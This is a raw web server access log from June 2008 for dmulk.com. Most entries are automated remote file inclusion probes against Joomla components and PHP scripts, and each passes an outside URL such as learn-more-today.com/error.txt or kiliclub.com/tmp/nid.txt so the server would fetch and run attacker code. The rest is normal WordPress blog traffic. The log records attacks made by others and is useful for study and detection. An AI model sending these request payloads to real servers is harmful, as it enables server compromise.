67.55.80.182 - - [09/Jun/2008:09:07:22 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:23 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:24 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:24 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:24 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:25 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:25 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:25 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:26 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:26 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:26 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.25.5.89 - - [09/Jun/2008:09:07:27 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:27 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:27 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:28 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:28 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:36 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:36 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:36 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:07:48 -0700] "GET /logs/access_080218.log//administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:07:49 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:07:49 -0700] "GET /logs//administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:07:56 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:07:57 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:08:05 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:08:05 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:08:15 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:08:30 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:08:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.137.8.243 - - [09/Jun/2008:09:08:32 -0700] "GET /logs/index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.137.8.243 - - [09/Jun/2008:09:08:35 -0700] "GET /index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 200 16793 "-" "Mozilla/5.0" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:08:39 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:08:40 -0700] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:08:40 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:08:41 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.58.78.39 - - [09/Jun/2008:09:08:43 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:09:09:06 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:07 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9331 "http://mail.google.com/mail/?ui=2&view=bsp&ver=ymdfwq781tpu" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:07 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:07 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:08 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:08 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:09:09 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:12 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:15 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:15 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:17 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:17 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:17 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:17 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:18 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:19 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:20 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&116 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
71.222.211.241 - - [09/Jun/2008:09:09:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.1" 200 387384 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:33 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:34 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:34 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:36 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:37 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:09:40 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:09:49 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:09:49 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:09:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:10:22 -0700] "GET /index2.php?x=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:10:23 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:10:25 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:10:29 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:10:36 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:10:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0046.jpg HTTP/1.1" 200 9865 "-" "Googlebot-Image/1.0" "dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:10:39 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:10:39 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:10:40 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.21.48 - - [09/Jun/2008:09:10:57 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://exbb.h11.ru/forums//im/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.48 - - [09/Jun/2008:09:10:57 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://exbb.h11.ru/forums//im/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:11:04 -0700] "GET /errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:07 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:07 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:11 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:12 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:11:22 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:11:23 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:11:23 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:11:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:11:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:11:29 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:11:35 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:09:11:41 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:09:11:42 -0700] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:11:42 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:09:11:42 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:09:11:42 -0700] "GET //blocks/block_site_map.php?root_folder_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:11:42 -0700] "GET /logs/access_080201.log//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:11:43 -0700] "GET //catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:11:43 -0700] "GET /logs//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:51 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:11:51 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:11:55 -0700] "GET /errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.186 - - [09/Jun/2008:09:12:03 -0700] "GET /logs/access_080215.log/index.php?x=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:12:03 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:12:04 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.208.186 - - [09/Jun/2008:09:12:08 -0700] "GET /index.php?x=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 200 16861 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.186 - - [09/Jun/2008:09:12:08 -0700] "GET /logs/index.php?x=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:12:11 -0700] "GET /logs/access_080201.log//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:12:12 -0700] "GET //catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
